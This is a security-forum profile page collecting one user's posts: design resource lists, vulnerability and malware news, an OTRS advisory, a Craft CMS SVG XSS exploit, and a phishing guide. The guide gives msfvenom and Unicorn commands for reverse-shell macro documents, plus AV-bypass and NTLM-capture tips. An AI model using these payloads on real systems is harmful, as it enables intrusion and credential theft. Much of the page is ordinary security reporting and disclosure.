Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


Fi8sVrs last won the day on May 31

Fi8sVrs had the most liked content!

Community Reputation

837 Excellent

About Fi8sVrs

  • Rank
  • Birthday

Recent Profile Visitors

1481 profile views
  1. ● Free design elements from Dribbble. ● Search Dribbble request "freebie". Priceless! ● Attractive work, made with care for each pixel. ● Free and premium work for the professional community. ● works in the style of the material design based on Google's leadership. ● Free creative work for children. ● Free PSD format works from the Dribbble website users. ● Fresh free work for designers. ● Download free psd every day. ● best free sites with Dribbble and Behance. ● high-quality work for the coolest people. ● free operation. ● Fresh free work on Mondays. ● Graphic elements for each. ● Free work, news and other information. ● most beautiful set of design elements for iOS. 30 useful resources for graphic designer All are invited to fill up the font files, textures, plug-ins, templates, brushes, action and different clipart. Please note you will need to carefully separate the wheat from the chaff on these resources. But the chance to find something suitable is still there. 1. - more than 800 sets of brushes 2. - brushes, shapes, textures, action games, frames, fonts 3. - brushes, styles, fonts 5. - brushes. Sorted by topic. 6. - gradients, patterns, brushes, Action Games, styles, textures, forms, templates 7. - brushes, patterns, textures, shapes, Action Games, fonts, gradients 8. forum forum / s = dd5a1f42da7b55558fa3f2fd the index.php? .. - warehouse on Demiarte: brush, plug-ins, clip 9. - brushes. Sorted by topic. 10. - gradients, brushes, Action Games, styles, textures, shapes, patterns 11. - a huge collection of brushes 12. - brushes, fonts, templates 13. www.photoshop- - gradients, brushes, Action Games, styles, textures, shapes, patterns 14. - Christmas brushes, fonts, styles, clipart 15. - brushes, fonts, shapes 16. - gradients, brushes, Action Games, styles, textures, forms, templates, fonts 17. - templates, brushes, fonts, textures 18. - a collection of brushes 19. - styles, shapes , textures, plug-ins, frames, patterns 20. - brushes, fonts, templates, frames 21. - brushes, plugins, Action Games, clipart, fonts, borders, textures 22. / download - brushes, fonts, styles, clipart 23. - plugins, brushes, actions, styles, shapes, gras ienty, textures, fonts 24. - plugins, brushes, styles, gradients, textures, fonts 25. - gradients, brushes, Action Games, styles, textures, forms, templates, drawing 26. www. - texture, brush, styles, filters 27. - fonts brush 28. - brushes, masks, eksheny , textures, fonts 29. - brushes, textures, shapes, fonts 30. - Action Games, gradients, brushes, plugins, styles, textures large list of useful resources for designers and web-developers 1. photos Free resources Unsplash - Picjumbo - www Gratisography - Superfamous - Little Visuals - Split Shire - Pixabay - I of'm the Free - www.imcreator. com / free the New Old Stock - the Function the free Photos - Paul Jarvis the free Photos - Paid resources Compfight - Stocksy - Placeit the Product Shots - iStockphoto - 2. Fonts Okay the Type - Typekit - the My Fonts - Fonts - the Font Squirrel - Da the Font - the Google Fonts - 1001 the Free Fonts - of Lost the Type Press the op-Co - Ico Moon - 3. Mockup Mockupr - Flinto - Flinto Icon Strike!  - WebFlow - Mockuuups - 4. Preliminary design Moqups - - Mockflow - a Mockingbird - 5. Prototyping Mixture - Gridset - 6. Adaptive design - .. Gridpak - for Responsive nav - Off the Navigation Screen - for Responsive the Web Design the Test - Media Queries - Foundation by ZURB - Jetstrap - WebFlow - Gridset - BrowserStack - Sassaparilla - the Dimensions - the Extension the Chrome 7. Working with color 0 to 255 - Colour Lovers - Brand the Colors - as Adobe Kuler the Color Wheel - https:// the Color a Scheme Designer - Hex to the RGB Converter - 8. the CSS Animate.css - of CSS3 the Animation Cheat Sheat - the Can I of the Use?  - the Animation the Fill Code - 9. the HTML 5 the HTML5 Please - the Can I of the Use?  - 10. Free files for Photoshop - Fribbble - Premium the Pixels - Teehan + Lax iOS 7 PSD file Gui (the iPhone) - www.teehanlax .com / tools / iphone Teehan + Lax iOS 7 PSD Gui (iPad)  - iPhone Mockuuups - 11. Icons Other Icons - Batch - www. Icon Sweets - Ico Moon - 12. image compression Tiny Png - JPEGmini - ImageOptim - 13. Tools for Photoshop the Mac Rabbit Slicy - Renamy - - 14. for inspiration Siteinspire - a Land Book - .com Awwwards - of The the Best Designs The - Dribbble - Behance - www.beha 15. Where to find orders ooomf - Juiiicy - Dribbble Jobs - Authentic Jobs - Workfu - Onsite - www 16. Build card MapBox - Leaflet - the Google the map Builder - Snazzy maps - 17. Online learning Treehouse - Dev.Opera - Steer - Lynda - Codeacademy -www. Code School - 18. Podcasts on the design and theme of web of The the Freelance the Web - Unfinished Business - Happy on Monday - Boagworld A - www.boagworld. com / show For / Shop Talk Show - of The the Back to the Front Show - of The Big the Web Show - .. Upfront Podcast - www.upfrontpodcast .com of The Industry - .. 19. presentation Art - Mark Boulton's Tips - .. the On Speaking's by Brad Frost - .. Suggestions for the Speakers by by Frank Chimero - of The: best advice on the public by speaking of Ladies in Tech - http : // You're paying to speak by Remy Sharp - http://remysha 20. Just useful websites Symbols - Service to remove their profiles on different sites - Learn your UDID - www. know what it looks like some kind of shape, icon, but can not remember the name? Draw it and you prompt - 21. Books Grid Systems' in the Graphic Design - the HTML & the CSS: Design and the Build the Web the Sites - of The Pocket Guide series: Collection 1,2 or 3 (just £ 6 for 4 in each books) The Geometry of Type - Insites: The Book - -book the Do not the Make Me the Think - Above the Fold - Design is a Job jobseeker - .. the required minimum books for the novice web dizaynera-
  2. A critical vulnerability has been discovered in Microsoft-owned most popular free web messaging and voice calling service Skype that could allow hackers to remotely execute malicious code and crash systems. Skype is a free online service that allows users to communicate with peers by voice, video, and instant messaging over the Internet. The service was acquired by Microsoft Corporation in May 2011 for US$8.5 Billion due to its worldwide popularity. Security researcher Benjamin Kunz-Mejri from Germany-based security firm Vulnerability Lab discovered the previously unknown stack buffer overflow vulnerability, which is documented in CVE-2017-9948, in Skype Web's messaging and call service during a team conference call. The vulnerability is considered a high-security risk with a 7.2 CVSS score and affects Skype versions 7.2, 7.35, and 7.36 on Windows XP, Windows 7 and Windows 8, Mejri said in a public security disclosure published on Monday. No User Interaction Needed What's worst? The stack buffer overflow vulnerability doesn't require any user interaction, and only require a low privilege Skype user account. So, an attacker can remotely crash the application "with an unexpected exception error, to overwrite the active process registers," or even execute malicious code on a target system running the vulnerable Skype version. The issue resides in the way Skype uses the 'MSFTEDIT.DLL' file in case of a copy request on local systems. Here's How Attackers can Exploit this Flaw According to the vulnerability report, attackers can craft a malicious image file and then copy and paste it from a clipboard of a computer system into a conversation window in the Skype application. Once this image is hosted on a clipboard on both the remote and the local systems, Skype experiences a stack buffer overflow, causing errors and crashing the application, which left the door open for more exploits Proof-of-Concept Code Released The security firm has also provided proof-of-concept (PoC) exploit code that you can use to test the flaw. Vulnerability Lab reported the flaw to Microsoft on 16th May, and Microsoft fixed the issue and rolled out a patch on 8 June in Skype version 7.37.178. If you are Skype user, make sure that you run the latest version of the application on your system in order to protect themselves from cyber attacks based on this vulnerability. Via
  3. Winpayloads is a tool to provide undetectable Windows payload generation with some extras running on Python 2.7. It provides persistence, privilege escalation, shellcode invocation and much more. The tool uses metasploits meterpreter shellcode, injects the users IP and port into the shellcode and writes a python file that executes the shellcode using ctypes. This is then AES encrypted and compiled to a Windows Executable using pyinstaller. Features UACBypass – PowerShellEmpire PowerUp – PowerShellEmpire Invoke-Shellcode Invoke-Mimikatz Invoke-EventVwrBypass Persistence – Adds payload persistence on reboot Psexec Spray – Spray hashes until successful connection and psexec payload on target Upload to local webserver – Easy deployment Powershell stager – allows invoking payloads in memory & more Winpayloads also comes with a few features such as UAC bypass and payload persistence. These are powershell files that execute on the system when the meterpreter gets a reverse shell. The UAC bypass is written by PowerShellEmpire and uses an exploit to bypass UAC on local administrator accounts and creates a reverse meterpreter running as local administrator back to the attackers machine. Winpayloads can also setup a SimpleHTTPServer to put the payload on the network to allow downloading on the target machine and also has a psexec feature that will execute the payload on the target machine if supplied with usernames,domain,passwords or hashes. Installation git clone cd winpayloads ./ will setup everything needed for Winpayloads Start Winpayloads ./ Type ‘help’ or ‘?’ to get a detailed help page Download Source
  4. 'Do I really need to give this website so much about me?' That's exactly what I usually think after filling but before submitting a web form online asking for my personal details to continue. I am sure most of you would either close the whole tab or would edit already typed details (or filled up by browser's auto-fill feature) before clicking 'Submit' — Isn't it? But closing the tab or editing your information hardly makes any difference because as soon as you have typed or auto-filled anything into the online form, the website captures it automatically in the background using JavaScript, even if you haven't clicked the Submit button. During an investigation, Gizmodo has discovered that code from NaviStone used by hundreds of websites, invisibly grabs each piece of information as you fill it out in a web form before you could hit 'Send' or 'Submit.' NaviStone is an Ohio-based startup that advertises itself as a service to unmask anonymous website visitors and find out their home addresses. There are at least 100 websites that are using NaviStone's code, according to BuiltWith, a service that tells you what tech sites employ. Gizmodo tested dozens of those websites and found that majority of sites captured visitors' email addresses only, but some websites also captured their personal information, like home addresses and other typed or auto-filled information. How Websites Collect 'Data' Before Submitting Web Forms Using JavaScript, the websites in question were sending user's typed or auto-filled information of an online form to a server at "," which is owned by NaviStone, leaving no option for people who immediately change their minds and close the page. When the publication asked NaviStone that how it unmasks anonymous website visitors, the company denied revealing anything, saying that "its technology is proprietary and awaiting a patent." However, when asked whether email addresses are gathered in order to identify the person and their home addresses, the company's chief operating officer Allen Abbott said NaviStone does not "use email addresses in any way to link with postal addresses or any other form of PII [Personal Identifiable Information]." Some websites using NaviStone's code are collecting information on visitors who are not even their customers and do not share any relationship with the companies. After the story had gone live, NaviStone agreed to no longer collect email addresses from visitors this way, as Abbott said, "While we believe our technology has been appropriately used, we have decided to change the system operation such that email addresses are not captured until the visitor hits the 'submit' button." Disable Auto-Fill; It’s Leaking Your Information! In order to protect yourself from such websites collecting your data without your consent, you should consider disabling auto-fill form feature, which is turned on by default, in your browser, password manager or extension settings. At the beginning this year, we also warned you about the Auto-fill feature, which automatically fills out web form based on data you have previously entered in similar fields but can be misused by attackers hiding fields (out of sight) in the web form and stealing your personal information without your knowledge. Here's how to turn this feature off in Chrome: Go to Settings → Show Advanced Settings at the bottom, and under the Passwords and Forms section uncheck Enable Autofill box to fill out web forms with a single click. In Opera, go to Settings → Autofill and turn it off. In Safari, go to Preferences and click on AutoFill to turn it off. Also, think twice before filling your details into any web form, before it gets too late. Via
  5. MySQL-G0ld This program issues brute force attacks against a MySQL Server, supply a CRLF wordlist. MySQL daemon should not have Remote MySQL enabled nor be exposed to the public internet. Think LAN, Privilege escalation, shared hosting attacks etc. Attack modes: Password spray / Basic File Hash: d3e11a2d0234cab7c9244c26d61004cc Language: C Credits: John Page aka hyp3rlinx Download (85.7 KB)
  6. This is pretty interesting, the prices for Fake News as a Service have come out after some research by Trend Micro, imagine that you can create a fake celebrity with 300,000 followers for only $2,600. Now we all know this Fake News thing has been going on for a while, and of course, if it’s happening, some capitalist genius is going to monetize it and offer it as a professional service. You can read the full 77 page report by Trend here: The Fake News Machine [PDF] It’s insightful to see the types of services that are available, and how they are categorised. Now I’ve known about social media manipulation for many years (fake likes, followers, YouTube views and so on) but to see this kind of Fake News at scale, as a service is something new to me. Unfortunately there’s no technical solution to thwart this, it’s purely about education. If people don’t fact check, cross check and verify sources before disseminating them this whole Fake News situation is just going to get worse and worse. I feel like it had a serious impact on both Brexit and the Trump election, and it’s likely to stay very relevant in any large scale World events as so many people now base their opinions on what they see online. Sources: Darknet The Register
  7. There are many ways to run a phishing campaign. The most common of them all is a typical credential harvesting attack, where the attacker sends an email to the target enticing them to click a link to a spoofed website. Running these campaigns are fairly straight forward, and a couple of tools make this very easy to do. The most common of all is likely the Social Engineer Toolkit. SET works great for cloning an existing website and setting up a PHP form to collect credentials. While this technique is very effective, it may also be a good choice to perform phishing attacks with malicious documents. Macro Attacks The most common Maldoc is a malicious Microsoft Word document. Typically these will contain embedded Macros which execute a payload when opened. Because of this, modern Windows will usually display two prompts that the user must click through before the payload is executed. Typically they must click “Enable Content” and the subsequently click “Enable Macros”. There a quite a few ways you can generate these. The most simple way is with Metasploit. As documented here, all you need to do is use msfvenom to generate some malicious visual basic code like so: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=8080 -e x86/shikata_ga_nai -f vba-exe And then paste it into the Visual Basic Editor. Set up a listener in the Metasploit framework and wait for the user to enable macros. msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST; set LPORT 8080; run; exit -y" While you can use multiple encoding types, this attack is likely to get caught by Anti-Virus. You can use other tools besides msfvenom to generate the VBA code required for the Macro. You can also use Unicorn by TrustedSec. To generate the payload use: python windows/meterpreter/reverse_tcp 443 macro And you can catch the meterpreter shell with the same listener you would use with the msfvenom payload. OLE Attack If you like Powershell Empire more than Metasploit, Empire also has a stager for office macros. Enigma0x3 has a good blog post on how to do this. Also notable is the OLE attack. Instead of using a macro to execute a payload, you can embed a file within the document itself. By changing the icon, you may be able to trick the user into executing a bat file which contains a malicious payload. This attack is also documented in the same blog post. This attack will prompt the user before executing payload as seen below: AV Bypass Because of the success of the Macro attack method, AV vendors have been quick to adapt. If AV is causing an issue, there are a few more tools that you can use to avoid detection. LuckyStrike is a tool that was released at DerbyCon 2016. The author has a lengthy blog post on this tool that is well worth the read. LuckyStrike contains a bunch of obfuscation methods to avoid detection and can even go as far as encrypting the payload ensuring that AV sandbox will never be able to execute it for dynamic analysis. If Software Restriction Policies or EMET are what is keeping you down, wePWNise might be the tool for you. As MRWLabs explains it on thier website, “It collects information through enumeration of relevant parts of the Registry where various policy security settings are stored, and identifies suitable binaries which are safe to inject code into.” Capturing Hashes Now to get into the more exotic methods. A very novel way of capturing NTLM hashes is with a tool named WordSteal. The way WordSteal works is by embedding a reference to a file hosted on a malicious SMB server. When the document is opened, the client will try to connect to the SMB server without any user interaction. This will capture an NTLM handshake and can be sent to a password cracker just as you would do if you were running Responder within the local network. The biggest caveat here is that the client network must be able to initiate SMB connections outbound. This means that they must not be any egress rule blocking port 445. This is not always the case, but if it goes through this is a good way to collect hashes as the user does not have to do anything other than open the document. If you are able to crack domain credentials, there is a good chance you can use Microsoft Outlook to execute a payload within the target environment as described in my blog post here: From OSINT to Internal – Gaining Access from outside the perimeter This attack requires a malicious SMB server. Fortunately, we can stand this up quite easily by using Metasploit. Just run the following module: use auxiliary/server/capture/smb And it will output any handshakes that it captures. Metasploit has the option of outputting this data in a format you can send to Cain and Abel or John the Ripper. Prompting for credentials Phishery is another great tool for non-traditional credential harvesting. Phishery is written in Go, and pre-compiled binaries are available here. The way Phishery works is by using HTTP Basic Authentication delivered over SSL. This tool is very easy to use, although to bypass the warnings to the end user you will need to set up a domain with a proper SSL certificate, or they will see this: After clicking “Yes” or bypassing it all together with a valid certificate, the user will receive an authentication prompt. If they enter their credentials, you will see them posted back to the listening server. Exploits While all these require some level of social engineering, you can also exploit the target with an exploit. Recently CVE-2017-0199 was disclosed by FireEye after it had been found in the wild. This exploit targets RTF files opened with Microsoft Word. MDSec had published a blog post on how to exploit it, and a blogger wrote a step-by-step set of instructions to create a working exploit. If you don’t want to do this manually, there is also a toolkit published on GitHub for exploiting this. It can create the RTF file, host the HTA payload, and host an exe that is executed by the HTA file. The only other things you need to make it work are msfvenom and Metasploit, although with some minor modifications it could be used to deliver any other payload as well, such as a Powershell Empire stager. At the time of this writing, there is a Metasploit module in development for this attack. A pull request has been opened, and will likely be merged into the main branch soon. Source:
  8. //removed
  9. caută pe torrent/warez
  10. @proxy_chainer, te-a lovit astenia de vară?
  11. CyberSecurity researchers found the Malware in Britney Spears Instagram account, where attacker appeared malicious comment post in her account. According to research, the Hackers group named TURLA behind the Malware, it's a Russian group known for targeting governments and officials. Cyber attackers spreading Malware through post the comment in world most famous singer Britney Spears Instagram account. According to Eset, Malware was hidden in a Firefox browser extension. The extension uses a bit.[ly] URL to reach its C&C, but the URL path is nowhere to be found in the extension code. In fact, it will obtain this path by using comments posted on a specific Instagram post. The one that was used in the analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account. Technical analysis This Firefox extension implements a simple backdoor. It will first gather information on the system it is running on and send it to the C&C, encrypted using AES. This is very similar to what the extension described in the Pacifier APT white paper is doing. The backdoor component has the ability to run four different types of commands: execute arbitrary file upload file to C&C download file from C&C read directory content – send a file listing, along with sizes and dates, to C&C While we believe this to be some type of test, the next version of the extension – if there is one – is likely to be very different. There are several APIs that are used by the extension that will disappear in future versions of Firefox. For example, it uses XPCOM to write files to disk and sdk/system/child_process to launch a process. These can only be used by add-ons that will be superseded by WebExtensions starting with Firefox 57. From that version onwards, Firefox will no longer load add-ons, thus preventing the use of these APIs. Conclusion The fact that the Turla actors are using social media as a way to obtain its C&C servers is quite interesting. This behavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social media to recover a C&C address are making life harder for defenders. Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C&C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim and finding new ways to make the C&C retrieval a bit more difficult. Via:
  12. We managed to get a recording of most of the talks during the 10th edition. While the recording quality is not the best, we hope it will benefit to people who couldn’t attend. For DevOops Redux, the recording quality was unfortunately really bad but the CERN did an awesome one the day before Insomni’hack. Seeing how great theirs was we would have been ashamed to publish ours, so here’s the link to this great talk hosted on the CERN’s site : And here’s the link to the Insomni’hack 2017 Youtube playlist : Source
  14. Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters. Versions affected include OTRS 5.0.x, OTRS 4.0.x, and OTRS 3.3.x -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2017-018 Product: OTRS Manufacturer: OTRS Affected Version(s): OTRS 5.0.x, OTRS 4.0.x, OTRS 3.3.x Fixed Version(s): OTRS 5.0.20, OTRS 4.0.24, OTRS 3.3.17 Tested Version(s): 5.0.19 Vulnerability Type: Access to Installation Dialog Risk Level: High Solution Status: Fixed Manufacturer Notification: 2017-05-30 Solution Date: 2017-06-06 Public Disclosure: 2017-06-08 CVE Reference: CVE-2017-9324 Author of Advisory: Sebastian Auwarter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: OTRS is a ticket management system. The manufacturer describes the product as follows (see [1]): "OTRS is one of the most flexible web-based ticketing systems used for Customer Service, Help Desk, IT Service Management. With a fast implementation and easy customization to your needs it helps you reducing costs and increasing the efficiency and transparency of your business communication." Due to insufficient checking of privileges, it is possible to access the OTRS Install dialog of an already installed instance, which enables an authenticated attacker to change the database settings, superuser password, mail server settings, log file location and other parameters. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The recommended way to install OTRS is to use the installation dialog found at http://vulnerablehost/otrs/ After successful installation, OTRS prevents further use of this installer. Any authenticated user can access the installation functionality of OTRS by referencing the installer via a crafted url. The URLs that can be used to access the installer can be one of the following: * http://vulnerablehost/otrs/ * http://vulnerablehost/otrs/;Subaction=Intro * http://vulnerablehost/otrs/;Subaction=Start * http://vulnerablehost/otrs/;Subaction=System At the end of each "installation" step, the user is redirected to the start page. Therefore, the next step of the installation dialog must be called directly using the Intro, Start (Database) or System subaction, respectively. By Using the installer tool, an attacker can change a variety of parameters, including the superuser password, database settings, mail server settings, log file location and instance ID. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): On a newly installed instance of OTRS, logged in as any valid user, navigate to;Subaction=Start to change the database parameters or to;Subaction=System to get a superuser password. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: This vulnerability is fixed in the latest versions of OTRS, and it is recommended to upgrade to the latest patch level. Fixed releases can be found at: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2017-05-30: Vulnerability discovered 2017-05-30: Vulnerability reported to manufacturer by project member 2017-06-06: Vulnerability reported to manufacturer via security advisory 2017-06-06: Fix provided by manufacturer 2017-06-06: Vulnerability disclosed by manufacturer 2017-06-08: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for OTRS [2] SySS Security Advisory SYSS-2017-018 [3] SySS Responsible Disclosure Policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Auwarter of SySS GmbH. E-Mail: Public Key: Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJZORr6AAoJEOmjDUji8Ki2Lt0P/iZ6DLr1ezWAhEHLxEdsrmGT OTpXaT3ANvvzWf4HH5NsIF/Q+kZAymNsW53MXxLJA0wZCj9t5cKR4UHptgd83W0h oNe3yOnYWPMf0L25PqNBy0wWVLLKL2Zme3xhSEYiEmbOCYERjr6IeX5td1i+PwwC wOkrYt/98o+XwtkMk25QyrQ0/IypNescPX2wj6zkOHkv0FcZUDsrAyOPFYBEyQ9q 7VUnNnUZlZK5h8hJZQ63c+5I/Ql5FxqtzPdkiZeYkj3oavaipWTKm2goCFzU8fA1 V1V5/ohQNd1Rk5sH+0NtC3KIMhbCA2hmH586jyDAgtZg6oRPXrHM4wFZE2SICKWy HeXIc1HUs6cvPFkFaxTNFL3Grb5NBuDBGxgwC7IQQ23pR3vYU3ckXC7UOj69sYSS bvGtcleYU17J7ND3YgQeVzMr58S/9i/mhZ/ya4WIGCp+9zh4YZiKzGK0PqFON+nn OQrQBLTwwTZz/VJJyWeaNWc7m4R4BXwi/BeYlAV3t51srWwCUV23NxDEXjKu4TZ7 0f93N0qYcSpVi0CIwPtA5IDTVNhOWSLzeco1zitJvDq5V9l4gbyAISXOFV12RxSh cduM6hUc6ALp1UziHQRpD8xUhFbF03WVysN5wHXrM9+d+TaVZ92KOaCv6VIWDVBh 63bQpoUQZ8L4LfzusTTl =EuyE -----END PGP SIGNATURE----- Source
  15. # Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload # Date: 2017-06-08 # Exploit Author: Ahsan Tahir # Vendor Homepage: # Software Link: # Version: 2.6 # Tested on: [Kali Linux 2.0 | Windows 8.1] # Email: # Contact: Release Date: ============= 2017-06-08 Product & Service Introduction: =============================== Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike. Abstract Advisory Information: ============================== Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6) Vulnerability Disclosure Timeline: ================================== 2017-06-08: Found the vulnerability. 2017-06-08: Reported to vendor. 2017-06-08: Published. Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6. Exploitation of the persistent xss web vulnerability requires a limited editor user account with low privileged (only editing news) and only low user interaction. If attacker upload any file that can use for XSS (HTML, SWF, PHP etc..) it will not accept to uplaod as image. But for images it will stay the same. So if attacker upload SVG with JS content it will work fine and execute JS! The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work. Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context. Proof of Concept (PoC): ======================= The persistent input validation vulnerability can be exploited by a low prviledged user/editor with privileges, only for editing news. After successful exploitation, this attack can be used by editor to hijack admin account! For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue. Payload (Exploitation): <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""> <svg version="1.1" baseProfile="full" xmlns=""> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> [+] Manual steps to reproduce .. 1. Login with the editor account (only privilege to edit news) in Craft CMS 2. Go to 'add news' option: https://localhost/admin/entries/news/new 3. Put random values in title 4. In your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload in the file: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""> <svg version="1.1" baseProfile="full" xmlns=""> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.domain); </script> </svg> 4. Upload the xss.svg file in featured image option in Craft CMS 5. Click on Save 6. Now go to: https://localhost/s/assets/site/xss.svg 7. XSS payload execution occurs and alert pop-up with domain name Credits & Authors: ================== Ahsan Tahir - [] Source